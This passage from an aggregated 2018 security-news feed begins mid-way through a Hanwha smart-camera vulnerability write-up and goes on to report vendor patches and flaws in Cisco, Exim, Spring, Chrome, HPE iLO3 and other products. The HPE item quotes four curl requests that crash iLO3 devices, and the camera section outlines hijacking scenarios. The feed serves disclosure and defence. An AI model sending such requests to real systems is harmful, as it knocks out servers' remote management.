Interestingly, in addition a buffer overflow-type vulnerability was detected inside of it. We reported the issue with undocumented feature to the manufacturer, and it has already fixed it.

Vulnerability in the cloud server architecture
Another example of a dangerous vulnerability in this smart camera can be found in the cloud server architecture. Because of a fault in the architecture, an intruder could gain access via the cloud to all cameras and control them.

One of the main problems associated with the cloud architecture is that it is based on the XMPP protocol. Essentially, the entire Hanwha smart camera cloud is a Jabber server. It has so-called rooms, with cameras of one type in each room. An attacker could register an arbitrary account on the Jabber server and gain access to all rooms on that server.

Message sent over XMPP using a test account created for research purposes

Decoded body of the above message

In the process of communicating with the cloud, the camera sends the user’s credentials and a certain set of constants. After analyzing the data sent, a remote attacker is able to register existing cameras in the cloud that have not been registered there yet. As a result of this, the cameras could subsequently not able to register in the cloud and, as a consequence, are not able to operate. In addition, an attacker can communicate with the cloud on behalf of an arbitrary camera or control arbitrary cameras via the cloud.

Attack scenarios
An interesting attack vector is the spoofing of DNS server addresses specified in the camera’s settings. This is possible because the update server is specified as a URL address in the camera’s configuration file. This type of attack can be implemented even if a camera doesn’t have a global IP address and is located within a NAT subnet. This sort of attack can be implemented by taking advantage of the peculiarities and vulnerabilities that exist in the Hanwha SmartСam cloud architecture. An attack like this could result in the distribution of modified firmware to cameras with the undocumented functionality loophole preinstalled, which will give privileged rights on those cameras.

If an intruder gains privileged rights (root) on a camera, they gain access to the full Linux functionality. This means the camera can be used as a foothold from which to attack devices located on local (within a NAT subnet) or global networks.

In one attack scenario, an arbitrary camera can be cloned and its image signal spoofed for the end user without much difficulty. To do so, an intruder will have to use cloud interactions to find out the target camera’s model, serial number and MAC address. The attacker then resets the password using a vulnerability in the password generation algorithm and modifies the firmware of the cloned camera (which is an identical camera located on the attacker’s side). The victim’s camera is then remotely disabled. As a result, the victim will receive a video signal from the attacker’s cloned camera.

Other possible scenarios involve attacks on camera users. The camera’s capabilities imply that the user will specify their credentials to different social media and online services, such as Twitter, Gmail, YouTube, etc. This is required for notifications about various events captured by the camera to be sent to the user. An attacker would then be able to exploit this capability to send phishing and spam messages.

Conclusion
What can a potential attacker do with the camera? Our research has demonstrated that they have a number of options.

For one, the attacker can remotely change the administrator’s password, execute arbitrary code on the camera, gain access to an entire cloud of cameras and take control of it, or build a botnet of vulnerable cameras. An attacker can gain access to an arbitrary SmartCam as well as to any Hanwha smart cameras.

What are the implications for a regular user? A remote attacker can gain access to any camera and watch what’s happening, send voice messages to the camera’s on-board speaker, use the camera’s resources for cryptocurrency mining, etc. A remote attacker can also put a camera out of service so it can no longer be restored. We were able to prove this hypothesis three times 🙂

We immediately reported the detected vulnerabilities to the manufacturer. Some vulnerabilities have already been fixed. The remaining vulnerabilities are set to be completely fixed soon, according to the manufacturer.

Fixed vulnerabilities were assigned the following CVEs:

CVE-2018-6294
CVE-2018-6295
CVE-2018-6296
CVE-2018-6297
CVE-2018-6298
CVE-2018-6299
CVE-2018-6300
CVE-2018-6301
CVE-2018-6302
CVE-2018-6303


Cisco Patches Hard-coded Password in PCP Software
9.3.2018 securityweek
Vulnerebility

Cisco this week announced the availability of software updates to address a hard-coded password vulnerability in Cisco Prime Collaboration Provisioning (PCP) Software.

Due to the existence of the hard-coded account password, an unauthenticated, local attacker could log into the underlying Linux operating system. The vulnerability can be abused to connect to the affected system via Secure Shell (SSH) using the hard-coded credentials.

According to Cisco, an attacker successfully exploiting the vulnerability could access the underlying operating system as a low-privileged user. However, the attacker could elevate privileges to root and take full control of the vulnerable system.

Because of the privilege escalation possibility, the vulnerability has a Security Impact Rating (SIR) of Critical, although it was also assessed with a Common Vulnerability Scoring System (CVSS) Base score of 5.9, which would normally come with a SIR of Medium.

The vulnerability impacts Cisco PCP Software release 11.6 only and no prior builds were found to be affected by it, Cisco notes in an advisory. Impacted customers should update to Cisco PCP releases 12.1 and later, as no workarounds that address this vulnerability exist.

The company also notes that it is not aware of “any public announcements or malicious use of the vulnerability.”

This week, the company also addressed CVE-2018-0147, a Critical (CVSS base score of 9.8) vulnerability in Java deserialization used by Cisco Secure Access Control System (ACS), which could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary commands on the device with root privileges,” Cisco explains.

The company also addressed a High risk (CVSS base score of 7.3) bug in the FTP server of the Cisco Web Security Appliance (WSA). Due to incorrect FTP user credential validation, an unauthenticated, remote attacker could exploit the bug to log into the server without a valid password or username.

This security issue affects Cisco AsyncOS for WSA Software running any release of Cisco AsyncOS 10.5.1 for WSA Software. Cisco AsyncOS 10.5.2-042 or later releases address the flaw.

Multiple Medium severity bugs were addressed in other Cisco products.


Hardcoded password and Java deserialization flaws found in Cisco products
8.3.2018 securityaffairs
Vulnerebility

The set of security updates recently released by Cisco also includes two advisories for critical vulnerabilities, a hardcoded password, and a Java deserialization flaw.
The lasters set of security updates released by Cisco also includes two advisories for critical vulnerabilities.

The first issue is a hardcoded password, tracked as CVE-2018-0141, that affects Cisco’s Prime Collaboration Provisioning (PCP) and that can be exploited by local attackers to gain full control over a vulnerable equipment.

The Cisco’s Prime Collaboration Provisioning application allows admins to remotely install and maintain Cisco voice and video solutions.

A local attacker just has to connect to the affected system via Secure Shell (SSH) using the hardcoded password, the

“A vulnerability in Cisco Prime Collaboration Provisioning (PCP) Software could allow an unauthenticated, local attacker to log in to the underlying Linux operating system.” reads the security advisory published by CISCO.

“The vulnerability is due to a hard-coded account password on the system. An attacker could exploit this vulnerability by connecting to the affected system via Secure Shell (SSH) using the hard-coded credentials. “

The hardcoded password can grant to a local attacker the access to a low-privileged user account, but chaining the vulnerability with other issues there is the risk that the attacker would elevate privileges to root.

The vulnerability has received a Common Vulnerability Scoring System (CVSS) Base score of 5.9, a score normally assigned to medium-severity flaws.

“Although this vulnerability has a Common Vulnerability Scoring System (CVSS) Base score of 5.9, which is normally assigned a Security Impact Rating (SIR) of Medium, there are extenuating circumstances that allow an attacker to elevate privileges to root. For these reasons, the SIR has been set to Critical.” continues Cisco.

Currently, there are no workarounds to address the vulnerability in PCP software, but Cisco has already released patches.

The second critical vulnerability, tracked as CVE-2018-0147, is a Java deserialization flaw that affects Cisco Access Control System (ACS) that can be exploited by an unauthenticated, remote attacker to execute arbitrary commands with root privileges on an affected device.

“A vulnerability in Java deserialization used by Cisco Secure Access Control System (ACS) could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.” reads the security advisory.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary commands on the device with root privileges.”

Cisco has released software updates to fix the flaw.


Memcached DDoS Exploit Code and List of 17,000 Vulnerable Servers Released
7.3.2018 thehackernews
Attack  Vulnerebility

Someone has just released proof-of-concept (PoC) exploit code for amplification attack and a pre-compiled list of nearly 17,000 potential vulnerable Memcached servers on the Internet that could even allow script-kiddies to launch massive DDoS attacks using UDP reflections easily.
Last week we saw two record-breaking DDoS attacks—1.35 Tbps hit Github and 1.7 Tbps attack against an unnamed US-based company—which were carried out using a technique called amplification/reflection attack.
For those unaware, Memcached-based amplification/reflection attack amplifies bandwidth of the DDoS attacks by a factor of 51,000 by exploiting thousands of misconfigured Memcached servers left exposed on the Internet.
Memcached is a popular open source distributed memory caching system, which came into news earlier last week when researchers detailed how hackers could abuse it to launch amplification/reflection DDoS attack by sending a forged request to the targeted Memcached server on port 11211 using a spoofed IP address that matches the victim's IP.
A few bytes of the request sent to the vulnerable Memcached server can trigger tens of thousands of times bigger response against the targeted IP address, resulting in a powerful DDoS attack.

For a detailed explanation on how Memcached amplification attack works, you can head on to our previous article.
Since last week when Memcached has been revealed as a new amplification/reflection attack vector, some hacking groups started exploiting unsecured Memcached servers.

But now the situation will get worse with the release of PoC exploit code, allowing anyone to launch massive DDoS attacks, and will not come under control until the last vulnerable Memcached server is patched, or firewalled on port 11211, or completely taken offline.
Moreover, cybercriminals groups have already started weaponizing this new DDoS technique to threaten big websites for extorting money.
Following last week's DDoS attack on GitHub, Akamai reported its customers received extortion messages delivered alongside the typically "junk-filled" attack payloads, asking them for 50 XMR (Monero coins), valued at over $15,000.
Reflection/amplification attacks are not new. Attackers have previously used this DDoS attack technique to exploit flaws in DNS, NTP, SNMP, SSDP, Chargen and other protocols in order to maximize the scale of their cyber attacks.
To mitigate the attack and prevent Memcached servers from being abused as reflectors, the best option is to bind Memcached to a local interface only or entirely disable UDP support if not in use.


Chrome 65 Patches 45 Vulnerabilities
7.3.2018 securityweek 
Vulnerebility

Released in the stable channel this week, Chrome 65 brings 45 security fixes, including 27 patches for vulnerabilities discovered by external researchers.

The browser also includes an updated JavaScript engine, namely V8 version 6.5. Announced in early February and initially made available in Chrome 65 Beta, the new V8 engine includes an untrusted code mode meant to mitigate the latest speculative side-channel attack called Spectre.

The 27 vulnerabilities reported by researchers include 9 security flaws assessed with a High severity rating, 15 bugs considered Medium risk, and 3 issues with a Low severity rating.

Google rewarded the researchers over $34,000 in bug bounties, but hasn’t provided details on all payouts in the published advisory.

The most important of the addressed bugs are two High risk use after free in Flash (CVE-2018-6058 and CVE-2018-6059). Both were reported by JieZeng of Tencent Zhanlu Lab in August 2017 and were awarded a $5,000 bounty each.

Google also addressed a Use after free in Blink (CVE-2018-6060) and a Race condition in V8 (CVE-2018-6061) – two High severity flaws awarded $3,000 each –, as well as a Heap buffer overflow in Skia (CVE-2018-6062) – awarded $1,000.

Other High risk issues resolved in Chrome 65 include two incorrect permissions on shared memory bugs, one Type confusion in V8, and one Integer overflow in V8.

The most important of the Medium risk issues was CVE-2018-6066, a Same Origin Bypass via canvas that was awarded a $4,000 bounty.

Other Medium severity issues addressed in this release include Buffer overflow in Skia, Object lifecycle issues in Chrome Custom Tab, Stack buffer overflow in Skia, CSP bypass through extensions, Heap buffer overflow in Skia, Integer overflow in PDFium, Heap buffer overflow in WebGL, and Mark-of-the-Web bypass.

Google also addressed an overly permissive cross origin download, incorrect handling of URL fragment identifiers in Blink, a timing attack using SVG filters, URL Spoof in OmniBox, Information disclosure via texture data in WebGL, and Information disclosure in IPC call.

The three Low risk bugs resolved in the browser include XSS in interstitials, circumvention of port blocking, and incorrect processing of AppManifests.

The new application release is available for download as version Chrome 65.0.3325.146 for Windows, Mac and Linux computers. Chrome for Android has been updated as well, now available as version 65.0.3325.109.


RCE flaw in Exim MTA affects half of the email servers online
7.3.2018 securityaffairs
Vulnerebility

A critical RCE vulnerability in the Exim mail transfer agent (MTA), tracked as CVE-2018-6789, affects most of the email servers online.
A critical remote code vulnerability in the Exim mail transfer agent (MTA), tracked as CVE-2018-6789, affects most of the email servers online. It has been estimated that as in March 2017, the total number of Internet’s email servers running Exim was over 560,000, that corresponds to 56% of all Mail (MX) Server online.

“We reported an overflow vulnerability in the base64 decode function of Exim on 5 February, 2018, identified as CVE-2018-6789. This bug exists since the first commit of exim, hence ALL versions are affected.” reads the blog post published by security firm Devcore.

“According to our research, it can be leveraged to gain Pre-auth Remote Code Execution and at least 400k servers are at risk. Patched version 4.90.1 is already released and we suggest to upgrade exim immediately.”

According to Shodan, the number of Exim Servers exposed online is more than 4 million, most of them in the US.

Exim

The flaw was discovered by the security researcher Meh Chang, which reported it to the Exim maintainers on February 2.

On February 10, the Exim team released Exim version 4.90.1 that addresses the flaw.

The researchers developed an exploit targeting SMTP daemon of Exim leverages a one-byte buffer overflow in the base64 decode function of Exim by tricking memory management mechanism.

“There is a buffer overflow in base64d(), if some pre-conditions are met. Using a handcrafted message, remote code execution seems to be possible. A patch exists already and is being tested.” reads the security advisory published by the Exim team.

Exim server owners should install the Exim 4.90.1 update as soon as possible.

Below the vulnerability timeline (UTC)

2018-02-05 Report from Meh Chang <meh@devco.re> via exim-security mailing list
2018-02-06 Request CVE on https://cveform.mitre.org/ (heiko) CVE-2018-6789
2018-02-07 Announcement to the public via exim-users, exim-maintainers mailing lists and on oss-security mailing list
2018-02-08 16:50 Grant restricted access to the security repo for distro maintainers
2018-02-09 One distro breaks the embargo
2018-02-10 18:00 Grant public access to the our official git repo.
In November the Exim team warned of other flaws through the public bug tracker.


Kaspersky Lab Offers $100,000 for Critical Vulnerabilities
6.3.2018 securityweek
Vulnerebility

Just days before its annual Security Analyst Summit kicks off in Cancun, Mexico, Kaspersky Lab this week announced an extension to its bug bounty program and plans to pay rewards of up to $100,000 for severe vulnerabilities in some of its products.

Launched in August 2016, the HackerOne-powered bug bounty program initially promised a total of $50,000 in bounties and resulted in the discovery of more than 20 flaws in the first six months. To date, the program allowed Kaspersky to address more than 70 bugs in its products and services.

In April last year, the Moscow-based security firm announced the addition of Kaspersky Password Manager 8 to the bounty program, along with an increase in the maximum reward for remote code execution vulnerabilities from $2,000 to $5,000.

The newly announced larger payouts represent a 20-fold increase on existing rewards available to researchers who participate in the company’s bug bounty program, which is available to all members of the HackerOne platform.

The largest rewards will be offered for the discovery and coordinated disclosure of bugs that enable remote code execution via the product database update channel, Kaspersky says. Another requirement is that the launch of the code takes place in the product’s high privilege process and silently from the user, and that persistence is also achieved.

Security flaws leading to other types of remote code execution will receive rewards ranging from $5,000 to $20,000, depending on their complexity level. The company also announced it is willing to pay researchers who discover bugs allowing local privilege escalation or leading to sensitive data disclosure.

Only previously unknown vulnerabilities discovered in Kaspersky Internet Security 2019 (the most recent beta) and Kaspersky Endpoint Security 11 (the most recent beta) qualify for the bug bounties. Supported platforms include desktop Windows 8.1 and higher, with the most recent updates installed.

“Finding and fixing bugs is a priority for us as a software company. We invite security researchers to make sure there are no vulnerabilities in our products. The immunity of our code and highest levels of protection that we offer customers is a core principal of our business – and a fundamental pillar of our Global Transparency Initiative,” Eugene Kaspersky, CEO of Kaspersky Lab, said.

Announced in October 2017, the Global Transparency Initiative was meant to clear Kaspersky’s name after reports suggested it had ties to the Russian government and the Department of Homeland Security (DHS) ordered all government agencies to stop using the company’s products.


Cisco Adds Vulnerability Identification to Tetration Platform
6.3.2018 securityweek
Vulnerebility

Cisco today announced the availability of identification of software vulnerabilities and exposures as part of the security capabilities of its Tetration platform.

Designed to offer workload protection for multi-cloud data centers through a zero-trust model that employs segmentation, the platform can now also detect vulnerabilities associated with software installed on servers.

With support for both on-premises and public cloud workloads, Tetration can now help identify security incidents faster, as well as contain lateral movement, in addition to reducing attack surface, Cisco says.

“Tetration is equipped to identify high severity security events such as Spectre and Meltdown using behavior-based anomalies,” Cisco notes.

The platform maintains an inventory of the software packages installed on the server, along with information on version and publisher. Leveraging the Common Vulnerabilities and Exposure (CVE) database, Tetration can detect packages with known CVEs.

The platform also offers a scorecard ranking the severity of specific vulnerabilities and reveals which servers might be affected, thus helping IT organizations proactively set up filters to find additional vulnerabilities.

Now, Tetration can also collect and maintain information about running processes on each server, on a real-time basis, Cisco announced. This should help IT managers find servers on which specific processes are running or have run. The collected information includes ID, parameters, duration, hash (signature), and the user running the process.

The identification of application behavior deviations from the baseline is also available on the platform, through the monitoring of workloads and networks for behavior that might be suspicious. Tetration first creates an application behavior baseline and then keeps an eye out for any deviations to identify attacks.

“For example, a process might seek to obtain privileged access that it should not have under normal behavior and use that privilege to execute a series of operations. Tetration can provide a time-series view of history to visualize process hierarchy and behavior information,” Cisco says.

The platform can search for specific process events and discover details such as privilege escalation, shell code execution, and side channel attacks.

According to Cisco, process behavior monitoring and identification of vulnerabilities allow Tetration to identify anomalies in minutes and reduce the attack surface up to 85%, while efficient application segmentation minimizes lateral movement. Furthermore, automation allows for a 70% reduction in human intervention to enable a zero-trust model.

“Tetration is powered by big data technologies to support the scale requirements of data centers. It can process comprehensive telemetry information received from servers in real-time (up to 25,000 servers per cluster). Tetration can enforce consistent policy across thousands of applications and tens of millions of policy rules,” Cisco notes.


Critical flaw in Pivotal’s Spring Data REST allows to hack any machine that runs an application built on its components
5.3.2018 securityaffairs
Vulnerebility

A critical flaw in Pivotal’s Spring Data REST allows remote attackers to execute arbitrary commands on any machine that runs an application built using its components.
Pivotal’s Spring Data REST project is affected by a critical vulnerability, tracked as CVE-2017-8046, that was discovered by security researchers at Semmle/lgtm.

Pivotal’s Spring Framework a platform is widely used by development teams for building web applications.

Spring Data REST builds on top of Spring Data repositories, it allows to expose hypermedia-driven HTTP resources (collection, item, and association resources) representing your model) for aggregates contained in the model.

The components included in the Spring Data REST are used by developers to build Java applications that offer RESTful APIs to underlying Spring Data repositories.

The vulnerability is similar to the weaknesses found in Apache Struts that resulted in the Equifax data breach.

“Security researchers at lgtm.com have discovered a critical remote code execution vulnerability that affects various projects in Pivotal Spring, the world’s most popular framework for building web applications.” reads the security advisory published by Semmle/lgtm. “The vulnerability allows attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.”

Pivotal's Spring Data REST

This flaw ties the way Spring’s own expression language (SpEL) is used in the Data REST component. The lack of validation of the user input allows the attacker to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

“Virtually every modern web application will contain components that communicate through REST interfaces, ranging from online travel booking systems, mobile applications and internet banking services,” continues the advisory.

Pivotal issued a security patch for a vulnerability it refers to as DATAREST-1127 as part of its Spring Boot 2.0 update.

“Malicious PATCH requests submitted to spring-data-rest servers can use specially crafted JSON data to run arbitrary Java code.” reads the security advisory published by Pivotal.

Researchers from lgtm.com have worked closely with Pivotal to solve the issue and publicly disclose the issue, the intent was to give Spring Data REST users sufficient time to update their apps.

The experts urge to apply the fix because it allows remote attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

The exploitation of the flaw in RESTful APIs could allow hackers to easily gain control over production servers and access sensitive information.

“This vulnerability in Spring Data REST is unfortunately very easy to exploit. As it is common for RESTful APIs to be publicly accessible, it potentially allows bad actors to easily gain control over production servers and obtain sensitive user data.” explained Man Yue Mo, lgtm.com security researcher at Semmle who discovered the issue.

The affected Spring products and components are:

Spring Data REST components, versions prior to 2.5.12, 2.6.7, 3.0RC3
(Maven artifacts: spring-data-rest-core, spring-data-rest-webmvc, spring-data-rest-distribution, spring-data-rest-hal-browser)
Spring Boot, versions prior to 2.0.0M4
(when using the included Spring Data REST component: spring-boot-starter-data-rest)
Spring Data, versions prior to Kay-RC3
Hurry up, upgrade to the latest versions the aabove components.


Microsoft released Windows Updates that include Intel’s Spectre microcode patches
4.3.2018 securityaffairs
Vulnerebility

Microsoft announced this week the release of the microcode updates to address the Spectre vulnerability.
Last week Intel released microcode to address the CVE-2017-5715Spectre vulnerability for many of its chips, let’s this time the security updates will not cause further problems.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost any platform, including systems running on Broadwell Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

Microsoft is going to deliver microcode updates for Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core) running on devices with 6th Generation Intel Core (Skylake) processors.

“This update is a standalone update available through the Microsoft Update Catalog and targeted for Windows 10 version 1709 (Fall Creators Update) & Windows Server version 1709 (Server Core).” read the advisory published by Microsoft. “This update also includes Intel microcode updates that were already released for these Operating Systems at the time of Release To Manufacturing (RTM). We will offer additional microcode updates from Intel thru this KB Article for these Operating Systems as they become available to Microsoft.”

Microsoft confirmed that almost any Window devices now have compatible security products installed and all problems with patches have been fixed.

“We have also been working closely with our anti-virus (AV) partners on compatibility with Windows updates, resulting in the vast majority of Windows devices now having compatible AV software installed.” wrote John Cable, Director of Program Management, Windows Servicing and Delivery

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility.”


A flaw in HP Remote Management hardware Integrated Lights-Out 3 leaves expose servers to DoS
4.3.2018 securityaffairs
Vulnerebility

Hewlett Packard Enterprise issued a security patch to address a vulnerability (CVE-2017-8987) in HP remote management hardware Integrated Lights-Out 3.
Hewlett Packard Enterprise has issued a security patch to address a vulnerability (CVE-2017-8987) in its remote management hardware Integrated Lights-Out 3 that equip the family of HP ProLiant servers.

The Hewlett-Packard iLO is composed of a physical card with a separate network connection that is used for the remote management of the device.

HP Remote Management

The vulnerability could be exploited by a remote attacker to power a denial of service attack that could cause severe problems to datacenters under some conditions.

The vulnerability in the HP remote management hardware Integrated Lights-Out 3 was discovered by the researchers at Rapid7 researchers in September, the issue is rated “high severity” and it has received a CVSS base score of 8.6.

“This post describes CVE-2017-8987, an unauthenticated remote Denial of Service vulnerability in HPE iLO3 firmware version 1.88. This vulnerability can be exploited by several HTTP methods; once triggered, it lasts for approximately 10 minutes until the watchdog service performs a restart of the iLO3 device. CVE-2017-8987 is categorized as CWE-400 (Resource Exhaustion) and has a CVSSv3 base score of 8.6.” states Rapid7.

Once an attacker has compromised a network he can lock out an admin to restore the operations causing severe problems to a data center.

“Several HTTP request methods cause iLO3 devices running firmware v1.88 to stop responding in several ways for 10 minutes:

SSH: open sessions will become unresponsive; new SSH sessions will not be established
Web portal: users cannot log in to the web portal; the login page will not successfully load
” continues Rapid 7.

HPE publicly disclosed the vulnerability on Feb. 22.

“A security vulnerability in HPE Integrated Lights-Out 3 (iLO 3) allows remote Denial of Service (DoS).” reads the security advisory published by HPE.

“HPE has provided the following instructions to resolve the vulnerability in HPE Integrated Lights-Out 3 (iLO 3) version 1.88: Please upgrade to HPE Integrated Lights-Out 3 (iLO 3) 1.89 which is available on HPE Support Center:

https://support.hpe.com/hpesc/public/home“

HPE said that affected version is v1.88 firmware for HPE Integrated Lights-Out 3 (iLO3), newer versions of the firmware (1.8, 1.82, 1.85, and 1.87) along with firmware for iLO4 (v2.55) are not impacted.

According to Rapid7 iLO5 devices were not tested, the experts also observed that requests calling the following four methods, will also trigger the Denial of Service:

curl -X OPTIONS hp-ilo-3.testing.your-org.com
curl -X PROPFIND hp-ilo-3.testing.your-org.com
curl -X PUT hp-ilo-3.testing.your-org.com
curl -X TRACE hp-ilo-3.testing.your-org.com

Below the disclosure timeline:

Sept 2017: Issue discovered
Thurs, Oct 19, 2017: Vendor released v1.89 update to iLO3, which addresses CVE-2017-8987
Mon, Nov 6, 2017: Vendor notified; vendor assigned PSRT110615 to this vulnerability
Wed, Nov 15, 2017: Additional details sent to vendor
Wed, Jan 10, 2018: Disclosed to CERT/CC
Wed, Jan 31, 2018: Vendor reported that v1.89 is not vulnerable to R7-2017-27; Rapid7 confirmed this finding.
Thurs, Feb 22, 2018: Public disclosure; vendor published security bulletin and assigned CVE-2017-8987
Thurs, Mar 1, 2018: Rapid7 published this post


Delta Patches Vulnerabilities in HMI, PLC Products
3.3.2018 securityweek
Vulnerebility

Taiwan-based Delta Electronics has patched several vulnerabilities in two of the company’s industrial automation products, including flaws that can be exploited for remote code execution.

A researcher who uses the online moniker “Axt” informed Delta via Trend Micro’s Zero Day Initiative (ZDI) and ICS-CERT that its WPLSoft product, a programming software for programmable logic controllers (PLCs), is affected by several types of vulnerabilities.

ICS-CERT’s advisory describes three types of flaws that can allow arbitrary code execution in the context of the current process or denial-of-service (DoS) attacks, specifically stack-based buffer overflow, heap-based buffer overflow, and out-of-bounds write issues. The security holes have been rated high severity and they are tracked as CVE-2018-7494, CVE-2018-7507 and CVE-2018-7509.

ZDI has published a total of nine advisories, one for each variation of these flaws. According to the company, the vulnerabilities are related to how the application parses .dvp files and they can be exploited by getting the targeted user to open a specially crafted file or webpage.

ZDI said it reported the security holes to Delta via ICS-CERT in February 2017. The company’s advisories suggest that the vendor attempted to release some patches last summer, but they did not properly fix the vulnerabilities. ZDI published its advisories in August 2017 with a “0Day” status.

ICS-CERT reported this week that the vulnerabilities were patched by Delta with the release of WPLSoft V2.46.0, which according to the vendor’s site was made available on February 2.

A separate advisory published this week by ICS-CERT describes a medium severity vulnerability found by researcher Ghirmay Desta in Delta’s DOPSoft human-machine interface (HMI) product.

The flaw, a stack-based buffer overflow, is related to the processing of .dop or .dpb files, and it can allow remote code execution. The issue affects DOPSoft 4.00.01 and prior, and it was patched with the release of version 4.00.04 on March 1.

This vulnerability was also reported to Delta via ZDI, but the company has yet to publish advisories. ZDI’s website shows a total of 17 upcoming advisories describing vulnerabilities found by Desta in the DOPSoft product in October 2017. Last year, the expert also found weaknesses in Delta’s PMSoft, a development tool for motion controllers.

ZDI was also recently informed by an anonymous researcher of four high severity flaws in an unnamed Delta product.

It’s not uncommon for ICS vendors to take hundreds of days to patch vulnerabilities. A report published last year by ZDI showed that the average patching time for SCADA flaws had been 150 days.


Windows Updates Deliver Intel's Spectre Microcode Patches
2.3.2018 securityweek 
Vulnerebility

Microsoft announced on Thursday that Windows users will receive the microcode updates released by Intel to patch the notorious Spectre vulnerability.

Meltdown and Spectre attacks allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to a flaw tracked as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be addressed with software updates, but Spectre Variant 2 requires microcode patches.

Microsoft has provided users the necessary software updates and it has now started delivering microcode patches as well.

After the first round of Spectre microcode patches from Intel caused more frequent reboots and other instability problems, the company started releasing new updates. The first patches were for Skylake, then for Kaby Lake and Coffee Lake, and this week for Haswell and Broadwell processors.

Intel has provided the microcode updates to device manufacturers, which are expected to make them available to customers once they have been tested.

For the time being, Microsoft will deliver Intel’s microcode updates to devices with 6th Generation Intel Core (Skylake) processors if they are running Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core).

“We will offer additional microcode updates from Intel as they become available to Microsoft. We will continue to work with chipset and device makers as they offer more vulnerability mitigations,” said John Cable, director of Program Management, Windows Servicing and Delivery.

When it started releasing software mitigations for Spectre and Meltdown, Microsoft warned that some users may not receive the updates due to antivirus compatibility issues. Cable said a vast majority of Windows devices now have compatible security products installed so they should not experience any problems in getting the patches.

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility,” Cable explained.

After news broke that Intel’s first round of microcode updates caused instability issues, Microsoft released an update that allowed Windows users to disable the problematic Spectre Variant 2 mitigation.


Philips Working on Patches for 35 Flaws in Healthcare Product
2.3.2018 securityweek 
Vulnerebility

Philips has informed customers that it’s working on patches for dozens of vulnerabilities affecting the company’s IntelliSpace Portal, a visualization and analysis solution designed for healthcare organizations.

According to Philips, versions 7.0.x and 8.0.x of the IntelliSpace Portal are affected by issues related to insecure Windows service permissions, legacy encryption, and remote desktop access functionality. A total of 35 CVE identifiers are associated with the vulnerabilities.

An advisory published by ICS-CERT describes the security holes as input validation flaws that allow remote code execution or denial-of-service (DoS) attacks, information exposure issues that allow unauthorized access to sensitive data, access control weaknesses that can be used for privilege escalation or code execution, local code execution and privilege escalation flaws, a code execution vulnerability that exists due to leftover debugging code, and multiple cryptographic issues. Serious vulnerabilities found in Philips IntelliSpace Portal

While some of these vulnerabilities appear to be specific to Philips’ product, many affect third-party components. For example, there are several remote code execution, information disclosure and DoS flaws related to Windows SMB, including the EternalBlue flaw exploited in the WannaCry ransomware attack.

Other flaws affect the Microsoft Remote Desktop Protocol (RDP) and Microsoft Office. The crypto-related weaknesses include POODLE, BEAST and other vulnerabilities disclosed in the past years, including one from 2004.

While exploits are publicly available for many of these vulnerabilities, they don’t specifically target Philips products, and the vendor claims it’s not aware of any attacks.

Philips will release patches in the coming months. The company says it’s also currently testing operating system updates, which cannot be installed without ensuring that they don’t impact the stability of the product. Until patches become available, customers have been provided a series of workarounds.

In January, Philips informed customers of an authentication issue affecting its IntelliSpace Cardiovascular (ISCV) cardiac image and information management system.

The company learned from a customer that when the ISCV system is used with an Electronic Medical Record (EMR) in Kiosk mode and configured with Windows authentication, users may not be properly logged out once they are done using the software.

The flaw allows a malicious actor that gains access to the system after it has been used by a legitimate EMR user to log in with that user’s credentials and obtain or modify sensitive information.

Philips said the security hole will be addressed with the release of version 3.1.0. In the meantime, users have been advised to close the browser after accessing the system. Changing the configuration so that Windows authentication is not used also addresses the problem.


Bugcrowd Raises $26 Million to Expand Vulnerability Hunting Business
2.3.2018 securityweek 
Vulnerebility

Crowdsourced security testing company Bugcrowd announced today that it has closed $26 million in a Series C funding round led by Triangle Peak Partners.

The new funding brings the total amount raised by the company to $50 million, including $15 million raised in a Series B funding round in 2016.

The company’s flagship “Crowdcontrol” offering is software-as-a-service platform that allows organizations run their own customized bug bounty programs to uncover and resolve security vulnerabilities in their products.

The new funding will be used to support product innovation and program management, the company said.

Bugcrowd currently operates the rewards programs of more than 70 different companiesnincluding security firms BitDefender, Centrify, NETGEAR, 1Password, Okta, Cylance, LastPass. Industry customers include MasterClass, Fiat Chrysler, Square, Fitbit, Mastercard, Tesla and Western Union. A recently announced Samsung Electronics' Mobile Security program rewards security researchers up to $200,000 per vulnerability, depending on its severity.

Existing investors Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Stanford participated in the Series C round, along with new investors Hostplus and First State Super.


Remotely Exploitable Flaws Patched in DHCP
2.3.2018 securityweek 
Vulnerebility

Updates released by the Internet Systems Consortium (ISC) for the Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP Client (dhclient), which provides a means for configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious server to cause the client to crash.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

